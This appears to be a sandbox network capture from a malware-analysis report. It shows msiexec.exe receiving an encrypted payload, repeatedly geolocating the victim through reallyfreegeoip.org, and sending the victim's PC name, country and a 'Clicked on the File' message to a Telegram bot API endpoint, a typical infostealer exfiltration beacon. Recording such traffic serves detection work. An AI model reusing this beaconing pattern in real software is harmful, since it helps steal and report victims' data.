2024-10-08 01:32:37 UTC	1390	IN	Data Raw: 5f b7 ea 16 e6 a3 d9 94 e7 f4 e2 ba 29 3d c3 4e bd ab 7b 2d b2 c5 4d 77 38 a5 56 68 7b 0f c6 6e f1 58 7a 2e c5 de 6c fa 04 62 26 31 11 2e 83 f4 34 60 8c 98 e8 ad e5 4c 48 c7 af 9e 0b 7d 76 2f 2e 4f 40 09 55 78 5a 29 e1 19 0a 8f 6f 9c 24 7a 9d a0 a8 d5 b3 b2 44 b6 4e 0e bd bf c9 5f 9f 2f 40 c5 7f a6 92 9d ea 21 1e f4 4d ee 4d 55 1d b7 e0 2d c8 89 55 8a 5c af 9b 1a 54 08 42 a1 3a ae fb 0d b4 67 ff be 10 19 0e 04 b6 54 91 d5 15 b8 4a 42 ce 47 f1 1b 05 d4 c5 c2 cf 20 eb d4 c9 4d 21 31 49 98 f4 45 54 f4 16 ad 09 38 a4 57 fc fe e3 f6 40 c0 ba 01 4a 7e e1 6c 87 bc 68 e5 78 1b 44 b0 47 c6 e2 e3 bb ba d5 83 89 1c e9 33 79 c0 c8 e9 80 57 74 ef 6a 04 ea e6 ac fc 84 9e e3 e3 c5 71 57 29 19 33 11 83 46 5d 05 29 93 53 8f 45 9a 33 14 78 84 32 17 81 4f 81 a6 bd 1a 6f 84 Data Ascii: _)=N{-Mw8Vh{nXz.lb&1.4`LH}v/.O@UxZ)o$zDN_/@!MMU-U\TB:gTJBG M!1IET8W@J~lhxDG3yWtjqW)3F])SE3x2Oo
2024-10-08 01:32:37 UTC	1390	IN	Data Raw: dd 7b d6 8b 1d db af 97 d4 57 8c 74 42 b3 d0 45 43 b2 eb c0 1d 2f 74 fe 9d e9 74 c2 f0 8c 54 b1 4c b5 15 c0 09 33 ec 3d 77 da eb 74 cc 40 67 05 df cb 22 9c 4c 47 d9 8e 40 f1 09 cd 20 cd 84 17 b3 0b bd 59 bb bf ec 50 6d c0 fd d9 7f 18 3e e0 be 2b 4a 7d 99 cd 60 e1 89 49 2a be 8f 6a e2 c8 5d ef 4c dd 76 6e d5 cf 5a da cf c5 71 3d 70 68 ea 64 fe dd 93 59 d6 47 25 d5 85 ac ba 7f f8 63 36 ad 20 aa cb ea d6 c4 c6 cb 1d 86 4f c6 e9 61 bf 5e 7d 4f 3a 8d e0 56 67 4c a5 98 2c 84 f2 bf 19 0d 9f 5b 74 30 ad b6 51 cf e2 c8 ee fe b0 43 32 b8 35 82 9b 29 3c 3b 8e 09 58 f3 aa ff c7 2c 80 9e f6 6d 43 e1 39 f9 1a f2 70 5f 85 dc 01 12 86 9c 43 c3 d1 a0 50 4a dc f7 92 c5 c2 f7 84 b8 05 22 f8 e1 9d a0 28 96 55 5e 25 50 0a 19 4d 00 f7 7b fe ef d3 13 00 e8 cc cb c7 d1 e1 0f e6 Data Ascii: {WtBEC/ttTL3=wt@g"LG@ YPm>+J}`I*j]LvnZq=phdYG%c6 Oa^}O:VgL,[t0QC25)<;X,mC9p_CPJ"(U^%PM{

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49880	188.114.96.3	443	2364	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 01:32:40 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-08 01:32:40 UTC	676	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 01:32:40 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17492 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DPLtooHRNSw0D9VVnTmX9Ux%2FpIZDaq2fJgd4DAAdxmXQ%2Bnm1Lcp07OiQRIVdpz5pwpVeOgOMMuWisDvD4Yaa8FPnpk4eEfkyjO0guuOcgR9ZyOx6W8mqFjkkgid8lnBkJq%2FTYhBb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf260e3dee37c7c-EWR
2024-10-08 01:32:40 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-08 01:32:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49886	188.114.96.3	443	2364	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 01:32:41 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-08 01:32:41 UTC	678	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 01:32:41 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17493 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qZzBSwRfxNv6QKD38pD8mEL46eKY2BtVIMt6%2FSiBoC4N0wi4HZss5B585WWEorcoJghogO%2Bnm%2FbxsDx6BsEeETk6sDvji28cUHz%2FKDohdz7QUlEVtxgtO9NHjbdysrIe2ReynZev"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf260e8fc04de99-EWR
2024-10-08 01:32:41 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-08 01:32:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49903	188.114.96.3	443	2364	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 01:32:43 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-08 01:32:44 UTC	678	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 01:32:43 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17495 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9t51VWMV%2BBKK8vFp2OtlfhzQQtmPU5lOqK7mj%2FkAB1gV7KG4IXgX4igbZQvcprBWdgJtbuPjS9O9PLl3Qrijz%2Fjw1iOIrv7MoawFICT77tindbvRK8RL0MK0l%2FafBPFTo6uDZB4n"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf260f6ae6d8c36-EWR
2024-10-08 01:32:44 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-08 01:32:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49912	188.114.96.3	443	2364	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 01:32:45 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-08 01:32:45 UTC	678	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 01:32:45 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17497 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G91NCnwR750QFQ89OJh4N2vCTOgrAL29sr%2FBSw%2Bl6cqiHnzwQsjSUTS2ptO1tc4W6gqKaGTOM0Ff%2FITqRVI8RIIqLaEs9cYOl5gEIqc80FNI0dMy86C%2FVwZBLQgpyWA1b592sl1u"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf260fe6977c354-EWR
2024-10-08 01:32:45 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-08 01:32:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49922	188.114.96.3	443	2364	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 01:32:46 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-08 01:32:46 UTC	680	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 01:32:46 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17498 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hvDUOxUmyiUFGjXqwVbXndmsq4%2FntQ3Oi8jDdZ%2B1R%2FcVqi6pozNiIpq%2FsCOy9G18mmQGVj9ISCU7hgPSUqG50P9xB1rqqp2kpWUuNpzeljI00Xs3ilwZmWSQK%2BZUApMRI59e0CNs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf26105ba410c82-EWR
2024-10-08 01:32:46 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-08 01:32:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49932	188.114.96.3	443	2364	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 01:32:47 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-08 01:32:47 UTC	672	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 01:32:47 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17499 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mwFDkWNXQEmBvA2KNXad5%2BM0B39eGVcaCYGqxpFJh6aIxBbQkataM1XoxcL6SA7yILPownwOZuJ38fZVzDDrI2byDthDPNsqqMwcahonwu54N22snqr8apnJSEdfIinRfbb5W6nA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf2610d2c09c46b-EWR
2024-10-08 01:32:47 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-08 01:32:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49941	188.114.96.3	443	2364	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 01:32:48 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-08 01:32:48 UTC	678	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 01:32:48 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17500 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R%2FkX3FuR%2B2hV3DHnR4l92bhKzjKN7Bjn6wahT4AiAUpaKTTxlwObgpXyKPkF52oEhdmY6iqGL%2F1P51BeeFig9bIX2WOW20XlGRuNflZDIxiG2hctVT9Lnmwxubzz1oo%2FbnBzm7Ih"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf26114aaa08cd7-EWR
2024-10-08 01:32:48 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-08 01:32:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49951	188.114.96.3	443	2364	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 01:32:49 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-08 01:32:50 UTC	680	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 01:32:49 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17501 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DjKSvrnEwUPw8vq4nWt44uaEOSu12Ws%2F0Xphs9J2FctIbTCEIoXfzvJAq2EoMIhy%2BWHuRuT%2BJprtAx4WcWVadNfp5%2FqmxHDj%2FCxHdViXkmAR6K6lNlNwwRepVyzhcg44HbywySCz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf2611c3fb20f90-EWR
2024-10-08 01:32:50 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-08 01:32:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49961	188.114.96.3	443	2364	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 01:32:51 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-08 01:32:51 UTC	682	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 01:32:51 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17503 Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gyaa0S%2BpC2JIYhkLjsvU3O3e%2BWY5JLMtLWBGW6I8f6ZWYnJKlPTKN%2FFsC2hT5kpaQeF%2BVfaEYtmfAqpUnyS69MyvKxRoufWqT%2FKaHQL9GJeaTPPVlsw0v%2BAFlgoZxOFZgYra8NJu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf26125ab0d0c90-EWR
2024-10-08 01:32:51 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-08 01:32:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49966	149.154.167.220	443	2364	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 01:32:52 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2008/10/2024%20/%2010:37:02%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-10-08 01:32:52 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 08 Oct 2024 01:32:52 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
